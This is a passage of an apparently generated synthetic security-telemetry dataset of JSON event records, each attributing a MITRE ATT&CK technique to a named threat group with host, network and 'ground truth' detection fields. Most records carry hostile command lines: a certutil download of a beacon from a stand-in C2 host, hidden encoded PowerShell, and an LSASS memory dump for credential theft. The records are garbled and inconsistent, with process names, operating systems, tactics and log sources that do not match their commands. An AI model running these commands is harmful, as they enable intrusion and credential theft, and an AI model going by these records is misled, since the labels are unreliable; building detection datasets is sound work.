SpiderT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.155.62.80","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-09T20:26:10.000Z","user":{"name":"svc_8e9ccio66dbb","sid":"S-1-5-21-428706589-206465295-5537"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Credential Access","Privilege Escalation","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20250926T200613000Z_0000697","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.7.84.125","name":"APP-WEB-XYYOJWI5PN","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"697APT41T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.92.202.118","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-28T20:23:28.000Z","user":{"name":"azuread\\bm9bi80yuuwk","sid":"S-1-5-21-940703637-894807612-4016"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_unc4841_20260322T125541000Z_0000699","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.236.186.214","name":"APP-WEB-ENSHXSDLE1","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"699UNC4841T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.31.127.129","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-07T15:29:49.000Z","user":{"name":"azuread\\7m731pciaakz","sid":"S-1-5-21-958043022-954367418-9548"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260203T045246000Z_0000701","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.6.139.250","name":"APP-WEB-IQ8QIFQS48","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"701Lapsus$T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.34.174.40","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-15T13:06:11.000Z","user":{"name":"azuread\\1fbmb2psrfe8","sid":"S-1-5-21-916068429-638648047-2102"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access","Collection"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260105T152034000Z_0000703","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.64.132.23","name":"EC2-INST-2G59NYG7O3","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"703Lapsus$T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.122.20.204","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-13T16:37:54.000Z","user":{"name":"arn:aws:iam::ci2pjkg442ix","sid":"S-1-5-21-726943746-320387762-6375"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260106T231027000Z_0000705","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.83.64.23","name":"IAM-ROLE-VBWGH5YG1K","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"705Lapsus$T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.182.170.121","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-09T09:10:25.000Z","user":{"name":"i-7i8zuyf0hfd3","sid":"S-1-5-21-735842039-605684868-4502"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection","Impact"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260720T103150000Z_0000707","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.176.58.120","name":"IAM-ROLE-GQV2YXMSD6","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"707Volt TyphoonT1546.003"},"network":{"domain":"github.com","dst_ip":"1.6.34.173","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-10-27T11:24:33.000Z","user":{"name":"CORP\\op0inl67dw7k","sid":"S-1-5-21-371027128-710101798-9888"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Exfiltration","Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250121T203347000Z_0000709","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.38.239.122","name":"DB-ORACLE-78BLGMZNXT","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"709FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.111.199.204","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-30T09:33:54.000Z","user":{"name":"arn:aws:iam::2r76b5zptc3p","sid":"S-1-5-21-507256377-724611190-5789"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20260329T203231000Z_0000711","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.8.11.234","name":"DB-ORACLE-1ESA0TWOER","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"711Scattered SpiderT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.4.69.91","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-28T09:08:48.000Z","user":{"name":"azuread\\dxk02t9d9669","sid":"S-1-5-21-940036448-523123776-7702"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Discovery","Collection"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260519T084528000Z_0000713","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.230.14.193","name":"APP-WEB-OHA6E0XYCA","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"713UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.136.228.70","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-24T18:30:31.000Z","user":{"name":"i-l2qhfs24nywq","sid":"S-1-5-21-826852594-777640689-4242"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Impact"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260313T045043000Z_0000715","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.224.70.193","name":"AZURE-VM-8PRBQ9HSLO","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"715Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.164.106.213","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1117 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-04T14:17:46.000Z","user":{"name":"CORP\\p2xz4h2118hz","sid":"S-1-5-21-657866502-142274531-9718"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260323T141513000Z_0000717","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.136.95.62","name":"WIN-FIN-SRV-8PSCMDFDB1","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"717APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.139.243.251","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 672 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-19T23:09:47.000Z","user":{"name":"arn:aws:iam::1t7wbuebgdo0","sid":"S-1-5-21-775493222-471480100-7715"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Collection","Command and Control"],"technique_id":"T1570"},"event_id":"evt_apt29_20260315T080212000Z_0000719","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.232.107.26","name":"IAM-ROLE-XVVCKAVSID","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"719APT29T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.110.75.98","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-07T16:35:12.000Z","user":{"name":"arn:aws:iam::vfj78js05dca","sid":"S-1-5-21-495940354-974511582-7052"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20251116T024655000Z_0000721","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.207.131.33","name":"EC2-INST-GITSK979FU","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"721APT41T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.165.221.246","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1802 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-18T01:30:29.000Z","user":{"name":"azuread\\m1na4tk354uy","sid":"S-1-5-21-884062670-911752422-7810"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Execution","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260912T225504000Z_0000723","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.155.210.130","name":"AZURE-VM-2MUH4UA8LL","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"723Scattered SpiderT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.65.188.220","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-03T10:50:04.000Z","user":{"name":"svc_2z864furevdy","sid":"S-1-5-21-813791438-915816598-3439"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Collection"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250125T104359000Z_0000725","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.149.62.63","name":"WIN-FIN-SRV-I4RAKRLLYR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"725FIN7T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.148.9.239","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-02-08T06:34:11.000Z","user":{"name":"CORP\\7tcxiszihdcn","sid":"S-1-5-21-104022911-661598031-3847"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20260317T062918000Z_0000727","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.3.202.80","name":"APP-WEB-ERGXZGC7ZO","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"727UNC4841T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.156.83.4","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-13T08:44:33.000Z","user":{"name":"CORP\\lutq9ui96po7","sid":"S-1-5-21-419011228-151282523-8183"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Execution"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20250329T181040000Z_0000729","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.103.141.140","name":"APP-WEB-NMG80VG789","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"729Scattered SpiderT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.130.12.41","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-09T14:45:10.000Z","user":{"name":"CORP\\18hefqpktkqp","sid":"S-1-5-21-697223457-692886685-6584"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20260415T074547000Z_0000731","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.197.195.120","name":"EC2-INST-TLF2HKD9AO","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"731FIN7T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.16.156.55","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-28T11:55:51.000Z","user":{"name":"azuread\\j2h9r0r91psm","sid":"S-1-5-21-159780855-977157102-4881"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20251220T174033000Z_0000733","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.193.84.4","name":"DB-ORACLE-ITK8LTJYTG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"733APT29T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.85.20.182","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-19T18:48:33.000Z","user":{"name":"CORP\\5f3k6075riu6","sid":"S-1-5-21-558431031-687316510-5464"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Discovery","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20251119T065013000Z_0000735","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.184.134.158","name":"IAM-ROLE-BD0IS2NSQR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"735Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.162.192.58","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3900 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-03T09:53:42.000Z","user":{"name":"svc_dhrsrwy6ravd","sid":"S-1-5-21-725012458-109931120-3149"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Collection"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20251009T175329000Z_0000737","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.52.123.205","name":"AZURE-VM-OD5BEX3Z69","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"737Scattered SpiderT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.162.40.43","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3047 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-14T05:10:15.000Z","user":{"name":"arn:aws:iam::3gx61cidqzce","sid":"S-1-5-21-113631040-362417869-2246"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20250616T094556000Z_0000739","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.138.147.4","name":"EC2-INST-GO7RSD96DG","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"739Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.30.39.127","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1616 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-15T19:21:32.000Z","user":{"name":"i-bq2cymfo7ode","sid":"S-1-5-21-175594911-190170201-3787"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Impact","Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260824T165703000Z_0000741","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.89.178.85","name":"IAM-ROLE-GBYMQIFP4B","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"741APT41T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.115.64.46","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-27T08:02:00.000Z","user":{"name":"i-h41nn2e6upni","sid":"S-1-5-21-730386449-804544664-8956"}}
|
